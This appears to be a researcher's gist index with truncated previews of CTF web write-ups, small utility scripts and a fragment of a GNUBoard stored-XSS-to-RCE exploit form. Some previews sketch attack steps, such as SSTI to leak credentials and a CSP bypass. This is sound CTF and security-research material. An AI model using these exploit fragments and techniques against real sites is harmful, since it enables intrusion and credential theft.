Last active Apr 19, 2021
BingoCTF 2020: Web - Guestbook [Hard]

web: guestbook writeup

Checking configs/worker


Docker-compose is built in a way that

  1. private has flag in /flag
  2. redis / worker are used. This is only used for the admin to check the challenge.
Last active Apr 19, 2021
BingoCTF 2020: Web - simpleboard [Medium]

web: simpleboard writeup

Let's check the main page's source code by view-source (view-source:

As we see in the following, the server loads an image from a website.

        <h3 class="text-center text-white pt-5"><img src="/?image=6c6f676f.png"></h3>

Let's take a look at the function in init.php that loads the image.

Last active Apr 19, 2021
BingoCTF 2020: Web - Temporary [Easy]

web: temporary writeup

There are two instances, namely public and internal. We can get the address of public by leaking $_SERVER['REMOTE_ADDR'] in phpinfo.php?phpinfo

Last active Jun 15, 2020
DEFCON Quals Web exploit (Participated as r3kapig)


  1. Write one comment
  2. When writing a comment content, do SSTI to leak author's credentials
Created Mar 17, 2020
Unzip with different encoding
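# Nothing on stackoverflow works!
import zipfile
import sys
zip = zipfile.ZipFile('FILENAME', 'r')
zipinfo = zip.infolist()
for _file in zipinfo:
    # Python 3's zipfile decodes names as cp437 unless the UTF-8 flag (0x800) is set;
    # undo that decoding, then decode the raw name bytes as cp949.
    if not _file.flag_bits & 0x800:
        _file.filename = _file.filename.encode('cp437').decode('cp949')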
Last active Feb 6, 2021
GNUBoard RCE ~2019.1
View exploit.html
Stored XSS (2019.01.02)
<form action="" method="POST">
<input type='hidden' name='fg_no' value=''>
<input type='hidden' name='fg_name' id='payload' value=''>
var random = Math.round(Math.random() * 1000000000);
var script_url = '//'; // RCE from admin
Last active Dec 30, 2020
Deobfuscated Papago API (Python/Javascript/PHP) : Blocked as of December 2020
View papago-api.php
// Ported from
// v1: b64_enc(rot13([:16]) + [16:])
/* Derived from stackoverflow */
function uuidgen() {
    // Random 8-4-4-4-12 hex string built from mt_rand() output
    return sprintf('%08x-%04x-%04x-%04x-%04x%08x',
        mt_rand(0, 0xffffffff),
        mt_rand(0, 0xffff), mt_rand(0, 0xffff), mt_rand(0, 0xffff),
        mt_rand(0, 0xffff), mt_rand(0, 0xffffffff)
    );
}
Last active Feb 9, 2020
CodeGate 2019 CSP challenge writeup


  1. if(md5($salt.$api_string) !== $sig){ can be bypassed with a hash length extension attack (didn't do it, but the key length is 12).

  2. Use custom header and body to trigger CSP bypass.

Last active Sep 18, 2019
2019 Cyber Operations Challenge Finals Pistol Exploit

Quick Summary

First-blooded this challenge. The server is down, I cannot explain briefly

  1. Comment in the website shows get_perm.php

  2. Another comment in the get_perm.php shows ?remote_debug=1.

  3. Using a PHP trick, you get a write post privilege.

Created Aug 16, 2019
Install MobSF Framework on CentOS 7 (with Headless Dynamic Analysis)
# Maintainer: Harold Kim (
# Tested in CentOS 7.6.1810
# $ lsb_release -a
# LSB Version: :core-4.1-amd64:core-4.1-noarch
# Distributor ID: CentOS
# Description: CentOS Linux release 7.6.1810 (Core)
# Release: 7.6.1810
# Codename: Core